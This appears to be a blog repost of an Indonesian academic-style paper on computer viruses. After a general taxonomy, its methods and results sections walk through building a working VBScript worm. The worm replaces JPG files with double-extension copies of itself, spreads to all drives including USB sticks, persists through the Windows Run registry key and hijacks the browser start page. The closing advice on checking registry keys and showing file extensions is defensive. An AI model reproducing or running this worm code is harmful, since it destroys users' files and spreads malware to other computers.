A computer virus is a computer program that can copy itself and infect a computer without permission or knowledge of the user. However, the term "virus" is commonly used, albeit erroneously, to refer to many different types of malware programs. The original virus may modify the copies, or the copies may modify themselves, as occurs in a metamorphic virus. A virus can only spread from one computer to another when its host is taken to the uninfected computer, for instance by a user sending it over a network or the Internet, or by carrying it on a removable medium such as a floppy disk, CD, or USB drive. Meanwhile viruses can spread to other computers by infecting files on a network file system or a file system that is accessed by another computer. Viruses are sometimes confused with computer worms and Trojan horses. A worm can spread itself to other computers without needing to be transferred as part of a host, and a Trojan horse is a file that appears harmless. Both worms and Trojans will cause harm to computers when executed.
Some viruses are programmed to damage the computer by damaging programs, deleting files, or reformatting the hard disk. Others are not designed to do any damage, but simply replicate themselves and perhaps make their presence known by presenting text, video, or audio messages. Even these begins viruses can create problems for the computer user. They typically take up computer memory used by legitimate programs. As a result, they often cause erratic behavior and can result in system crashes. In addition, many viruses are bug-ridden, and these bugs may lead to system crashes and data loss.
Keywords : computer virus, worm, trojan horse, malware
I. PENDAHULUAN
Belakangan ini sering sekali kita mendengar tantang istilah virus komputer. Tetapi saat ini masih banyak masyarakat yang belum mengerti tentang cara kerja virus komputer itu sendiri. Dengan mengetahui teknik pembuatan dan penyebaran virus komputer maka nantinya diharapkan kita semua dapat terhindar dari kerusakan dan kerugian yang diakibatkan oleh virus komputer.
Virus komputer merupakan sebuah program komputer yang dapat menggandakan diri atau menyalin dirinya dan menyebar dengan menyisipkan atau membuat salinan dirinya pada dokumen atau berkas lain. Virus komputer dapat merusak, misalnya merusak sebuah file dokumen word, file executable serta mengganggu sistim kerja komputer. Saat ini Virus Komputer hanya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras. Efek gangguan dari virus komputer ini adalah dapat memperbanyak dirinya sendiri pada saat komputer bekerja, sehingga sumber daya komputer menjadi berkurang. Saat ini hampir 95% virus komputer menyerang sistim operasi Windows, 2% virus komputer menyerang sistim operasi Linux , sebanyak 1% menyerang sistim operasi Mac dan sisanya sebanyak 2% virus komputer menyerang sistim operasi lain seperti FreeBSD, OS/2 IBM dan Sun Operating System.
Sebuah program komputer dapat dikatakan sebagai virus komputer jika memenuhi kriteria sebagai berikut:
1. Menyembunyikan prosesnya dari pemakai
2. Mengaktifkan dirinya setiap startup sistem
3. Menyebarkan dirinya melalui media file executable
4. Mempercepat proses penyebarannya melalui media pertukaran data dan informasi
5. Mempercepat penyebarannya dengan memanfaatkan kelemahan dari suatu system
6. Menyebarkan dirinya dengan filename spoofing.
7. Mempercepat proses penyebarannya dengan pendekatan social engineering
8. Berusaha mempertahankan existensi dirinya
Saat ini virus komputer dikelompokkan menjadi beberapa jenis antara lain:
1. Computer worm (cacing komputer) adalah sebuah program yang dapat menyebarkan dirinya didalam banyak komputer dengan cara menggandakan dirinya kedalam setiap memory komputer yang telah terinfeksi. Sebuah computer worm juga dapat menyebar melalui jaringan komputer atau jaringan internet. Contoh virus komputer yang termasuk jenis ini adalah ADMWorm, Love Letter, Brontok, Nimda, Kespo.
2. Trojan Horse (kuda troya) adalah sebuah program komputer yang seolah-olah berguna tetapi didalamnya tersembunyi kode-kode yang berbahaya yang biasanya digunakan untuk "mencuri" data pada komputer untuk dikirimkan kepada pembuat trojan horse. Kebanyakan jenis trojan horse ini tersembunyi pada perangkat lunak yang digunakan untuk crack atau key generator. Contoh dari beberapa perangkat lunak yang termasuk jenis trojan horse adalah DDoS Trojan, Back Office, Sub Seven dan Passfilt Trojan.
3. Adware sebuah perangkat lunak yang dapat menyebarkan informasi berupa iklan pada komputer yang terhubung dalam jaringan internet. Adware ini tidak begitu berbahaya tetapi kehadirannya terkadang menggangu para pengguna komputer, karena dapat menuliskan informasi-informasi yang berupa iklan dari pembuat adware pada komputer kita. Beberapa website yang berisi pornografi sering memanfaatkan adware ini untuk mengiklankan diri.
Spyware adalah turunan dari Adware. Spyware ini lebih berbahaya karena dapat "mencuri" data kita yang akan dikirimkan kepada pembuatnya. Yang sering dijadikan target "pencurian" data dari spyware ini adalah address book pada aplikasi Microsoft OutLook yang nantinya akan dikirimkan kepada pembuat spyware.
II . METODE PENELITIAN
Setelah mengetahui penjelasan tentang virus komputer maka kita akan mencoba membuat sebuah virus komputer jenis worm dengan menggunakan Visual Basic Script. Dipilihnya Visual Basic Scipt karena interpreter untuk Visual Basic Script ini sudah tersedia pada sistim operasi Windows, yaitu pada file cscript.exe yang terletak pada folder c:\windows\system32.
Sebelum merancang sebuah virus komputer hal yang pertama kita lakukan adalah merancang terlebih dahulu skenario kerja sebuah virus komputer yang akan dibuat. Hal yang akan dilakukan oleh virus komputer yang akan dibuat adalah sebagai berikut:
1. Menyerang file gambar JPG
2. Mencari file-file gambar JPG yang ada pada sebuah folder
3. Menularkan virus pada setiap drive yang aktif termasuk flashdisk
4. Virus akan aktif setiap kali sistim operasi Microsoft Windows dijalankan
5. Merubah halaman tampilan awal pada browser Internet Explorer agar menuju alamat situs web tertentu
Diagram Alur (Flow Chart) dari virus komputer tersebut adalah sebagai berikut:
Gambar 1
Diagram Alur Virus
III. HASIL DAN PEMBAHASAN
Pertama kali kita terlebih dahulu mendefinisikan macam variabel yang digunakan dengan perintah:
on error resume next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive
Mengatur file system object dengan perintah:
set fso = CreateObject("Scripting.FileSystemObject")
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject("WScript.Shell")
Mengambil posisi folder saat ini:
myfolder = Left(fsource,InStrRev(fsource,"\"))
Salin virus pada folder C:\WINDOWS\SYSTEM32\:
fsource.Copy("c:\windows\system32\wolio.vbs")
Untuk mencari file JPG pada folder tertentu dan menularinya dibuatlah sebuah sub program bernama carifilejpg(myfolder) dan serangan_jpg(target).
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)="jpg") then serangan_jpg(filetarget)
Next
End Sub
Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,".")) & "jpeg")
set fbackup = fso.GetFile(Left(target,instrrev(target,".")) & "jpeg")
fbackup.Attributes = 2
fsource.Copy(Left(target,instrrev(target,".")) & "jpg " & ".vbs")
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Untuk menyalin virus ke folder tertentu digunakan sub program serangan_folder(foldername).
Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & "\wolio.vbs")
carifilejpg(subfolder)
next
End Sub
Untuk merubah Registry Windows agar virus komputer aktif setiap kali Sistim Operasi Windows dijalankan digunakan perintah :
if (regedit.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\Current\Version\Run\Wolio")<>"c:\windows\system32\wolio.vbs") Then
regedit.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current\Version\Run\Wolio",
"c:\windows\system32\wolio.vbs"
End If
Langkah berikutnya adalah menyalin virus pada semua drive dibuatlah sub program serangan_drive().
Sub serangan_drive()
Set Drives=fso.drives
For Each Drive in Drives
If drive.isready Then
fsource.Copy(drive & "\" & "wolio.vbs")
End If
Next
End Sub
Untuk merubah tampilan awal Internet Explorer agar menuju situs web tertentu dibuatlah sub program serangan_ie() sebagai berikut:
Sub serangan_ie()
If (regedit.RegRead("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page")<>"http://www.baubau.go.id") Then
regedit.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page","http://www.baubau.go.id"
End If
End Sub
IV. KESIMPULAN DAN SARAN
a. Kesimpulan
Berdasarkan pada hasil penelitian dan pembahasan diatas maka kita dapat mengetahui bahwa virus komputer dapat dibuat dengan sangat mudah hanya dengan sedikit pengetahuan bahasa pemrograman tertentu dalam contoh tersebut dibuat sebuah virus komputer yang dibuat dengan menggunakan pemrograman Visual Basic Script.
Pada bagian diatas telah disebutkan bahwa agar virus selalu aktif setiap kali sistim operasi Windows dijalankan maka virus akan merubah Registry Windows pada bagian :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current\Version\Run\ .
Jadi pada dasarkan untuk menon-aktifkan sebuah virus komputer kita perlu memeriksa bagian Registry Windows tersebut dan memastikan tidak ada program-program yang mencurigakan yang ada pada bagian itu.
Pada virus komputer yang dibuat kali ini adalah menyerang file-file JPG dan menggantinya dengan program virus. Cara mengelabuhi pemakai dengan teknik double extension yaitu memberikan dua buah ekstensi pada file virus misalkan menjadi filesaya.jpg.vbs. Karena pada posisi default sistim operasi Windows akan menyembunyikan ekstensi file sehingga pemakai awam menyangka file tersebut bernama filesaya.jpg.
b. Saran
Berdasarkan pada kesimpulan diatas maka untuk mencegah dan terhindar dari bahaya virus komputer maka dapat dilakukan beberapa cara antara lain:
* Periksalah proses yang sedang berjalan pada sistim operasi Windows dengan cara melihat dan mengawasinya dengan "Task Manager" dengan cara menekan tombol Ctrl-Alt-Del secara bersamaan dan klik tab Processes. Jika ada aplikasi yang dirasa mencurigakan kita dapat menghapus aplikasi tersebut dengan cara memilih aplikasi yang dicurigai dan klik tombol "End Process".
Periksalah Registry Windows terutama pada bagian :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current\Version\Run\
atau
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current\Version\RunOnce\
Bagian inilah yang selalu digunakan oleh virus komputer untuk aktif pada saat sistim operasi Windows dijalankan. Jika ada program yang dirasa mencurigakan kita dapat menghapusnya.
* Sebaiknya ubahlah pengaturan pada Explorer pada sistim operasi Windows pada bagian Tools - Folder Options - Tab View.
* Sub Hidden files and folders pilihlah Show hidden files and folders.
Pengaturan tersebut digunakan untuk menampilkan file-file yang tersebunyi (hidden) yang biasanya sering dilakukan oleh virus komputer.
Sub Hide extensions for known file types jangan diberikan tanda check
Pengaturan ini digunakan untuk menghindari "tipuan" dari virus komputer yang menyamar menjadi file tertentu, misalkan file word, excel atau virus komputer yang dibuat dengan Visual Basic Script sering menggunakan teknik double extensions untuk mengelabuhi pemakai.
V. DAFTAR PUSTAKA
http://id.wikipedia.org/wiki/Virus_komputer
http://id.wikipedia.org/wiki/Brontok
http://id.wikipedia.org/wiki/Nobron
http://compactbyte.com/brontok/analisisbrontok.html
http://id.wikipedia.org/wiki/Worm
http://id.wikipedia.org/wiki/Trojan_horse
http://id.wikipedia.org/wiki/Spyware
http://id.wikipedia.org/wiki/Adware
http://www.howstuffworks.com/virus.htm
http://en.wikipedia.org/wiki/Computer_virus
http://computer.howstuffworks.com/virus1.htm
http://computer.howstuffworks.com/virus2.htm
http://computer.howstuffworks.com/virus3.htm
http://computer.howstuffworks.com/virus5.htm
http://www.microsoft.com/protect/computer/basics/virus.msp
sumber : anon kuncoro
Tidak ada komentar:
Posting Komentar